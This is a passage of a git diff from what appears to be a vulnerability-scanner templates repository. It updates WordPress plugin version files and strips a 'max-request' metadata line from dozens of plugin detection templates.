103bfb6b11..b3956576d7 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -7.8.7 \ No newline at end of file +7.8.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index 4f3470c166..f0f76fb693 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.1 \ No newline at end of file +4.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 358e78e607..132c6def58 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.1.0 \ No newline at end of file +6.1.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index d6200aaea4..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -1,13 +1,12 @@ id: wordpress-custom-fonts info: - name: Custom Fonts Detection + name: Custom Fonts – Host Your Fonts Locally Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index 96c813ad49..c9859e9770 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-google-fonts/ metadata: - max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: 